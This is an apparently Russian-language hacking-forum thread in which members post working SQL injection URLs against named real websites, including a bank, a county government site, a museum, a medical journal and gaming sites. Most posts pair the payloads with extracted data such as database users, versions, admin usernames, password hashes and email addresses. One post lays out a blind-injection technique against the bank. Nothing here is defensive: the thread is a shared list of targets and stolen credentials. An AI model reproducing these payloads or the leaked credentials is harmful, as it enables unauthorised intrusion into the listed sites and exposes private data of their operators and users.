HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.04.2009, 00:27
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Строительный портал

Цитата:
http://baza.in.ua/topsite/kom.php?id=-44+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32--
Database Version: 4.1.22-log
Database name: baza1_topsite
User name: baza1_topsite@v48632.freefost.com.ua

Выводить из users
 
Ответить с цитированием

  #2  
Старый 18.04.2009, 00:38
hitt 1g
Новичок
Регистрация: 14.04.2009
Сообщений: 6
Провел на форуме:
71588

Репутация: 44
По умолчанию

Цитата:
http://www.hickman.ne.gov/index.php?pid=164+union+select+1,2,concat_ws(0x3a, username,pass,email),4,5,6,7,8,9+from+Users+limit+ 0,1--
DB Version: 5.0.75-community-log
DB Name: hickmann_hickman
DB User:hickmann_hweb@localhost

Admin data: hickmanadmin:8dbdda48fb8748d6746f1965824e966a:dann is@diodecom.net

Цитата:
http://www.mpm.edu/collections/staff/staff.php?s=-1+union+select+1,2,3,4,concat_ws(0x3a,fname,pword, umail,memlev),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20+from+mpmadmin.tbladmin+limit+0,1--
DB Version: 5.0.67-community-nt
DB Name: mpmstaff
DB User:mpmadmin@localhost

Admin data: Development:nogo:membership@mpm.edu
 
Ответить с цитированием

  #3  
Старый 18.04.2009, 00:34
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


По умолчанию

geomap.ru
карты городов
pr4 тиц100
Код:
http://geomap.ru/payment?pid=3&cid=25+and+1=0+union+select+concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),2+--+--

geomap_map@localhost geomap_map 5.0.26-lk-log /usr/ /var/lib/mysql/ /tmp pc-linux-gnu
__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 18.04.2009 в 00:43..
 
Ответить с цитированием

[-_-]
  #4  
Старый 18.04.2009, 02:06
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
По умолчанию [-_-]

Закрытое Акционерное Общество Булгар Банк.
Цитата:
http://www.bulgarbank.ru/download.php?file_id=218+and+ascii(substring((sele ct+version()),1,1))=52
Слепая скуля. Если выполняется то начинается закачивание .zip если нет то download.php ))) => 4ая ветка.

Можно проверить существует ли таблица
Цитата:
http://www.bulgarbank.ru/download.php?file_id=218+union+select+1,2+from+qwe rty
Код:
Table 'bulgarbank.qwerty' doesn't exist
Цитата:
http://www.bulgarbank.ru/download.php?file_id=218+union+select+1,2+from+mys ql.user
Код:
Access denied for user 'bulgarbank'@'localhost' to database 'mysql'
Стоит админка CubiQue.Где у неё юзеры в базе или в конфиге хз,писал на мыло саппорту насчет админки они так и не ответили,ну и пох))))

Официальный сайт. Студенческий профком УлГУ
Цитата:
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,c onvert(user()+using+binary),3,4,5,6,7
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,c onvert(database()+using+binary),3,4,5,6,7
http://students.ulsu.ru/modules/sections/index.php?op=listarticles&secid=4+union+select+1,c onvert(version()+using+binary),3,4,5,6,7
Код:
students@localhost:students:4.1.14
 
Ответить с цитированием

  #5  
Старый 18.04.2009, 06:12
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

http://www.hayonstudio.com/project.php?id=4+and+substr(version(),1,1)=5/*

http://www.shoplifted.co.uk/index.cfm?act=shop&process=full&id=453+and+substr( version(),1,1)=5/*
 
Ответить с цитированием

  #6  
Старый 18.04.2009, 08:59
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию

www.groundworkopensource.com Pr-6
PHP код:
http://www.groundworkopensource.com/products/poll-results.html?poll_id=6+union+select+1,concat_ws(0x3a,user(),user,password,host,file_priv),3+from+mysql.user--+&novote=1 
 
Ответить с цитированием

  #7  
Старый 18.04.2009, 10:48
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Код:
http://www.alsystems.com/newsletter.php?id=-11+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9
alsystem_alsyste@localhost:alsystem_alsys:5.0.67-community
 
Ответить с цитированием

  #8  
Старый 18.04.2009, 10:58
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
По умолчанию

http://www.press-conferences.ru/next.php?pid=1%20union%20select%20version()--

4.0.21 -

Давно меня небыло. Сорри инета нету!

Последний раз редактировалось jokester; 18.04.2009 в 11:31.. Причина: sport-gym.ru БОЯН сам-же и выкладавал, повнимательнее
 
Ответить с цитированием

  #9  
Старый 18.04.2009, 13:27
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Япония В России>>
Код:
http://japonia.ru/info/new_window.php?id=-313+union+select+1,2,3,4,concat_ws(0x2a3a2a,version(),database(),user(),@@version_compile_os),6,7,8,9--+
4.1.25*:*japonia_content*:*japonia_content@localho st*:*portbld-freebsd6.3
Код:
http://japonia.ru/admin/
-----------------------------------------
----------------------------------------
MSSQL
<<Yonsei Medical Journal>>
Код:
http://www.eymj.org/abstracts/subList.asp?year=1998'+or+1=@@version--
VERSION:
Код:
[Microsoft][ODBC SQL Server Driver][SQL Server]nvarchar 값 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Последний раз редактировалось farex; 18.04.2009 в 14:26..
 
Ответить с цитированием

  #10  
Старый 18.04.2009, 15:05
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
По умолчанию

Код:
http://www.swmgamers.com/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,user_password,8,9,0,11,12,13%20from%20e107_user--
Version : 4.1.22-max-log
OS : unknown-linux-gnu

Код:
3302:9db50106284fbd34f22d89a835f6e024 - rtx35b29

-------------------------------------------------+

Код:
http://opengamestudio.org/Main/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,user_password,8,9,0,11,12,13%20from%20e107_user--
Version : 4.1.22-standard-log
OS : unknown-linux-gnu



Код:
0x21h:7536c300f434b5db60b39ce300ca1c7d

Последний раз редактировалось f1ng3r; 18.04.2009 в 15:12..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.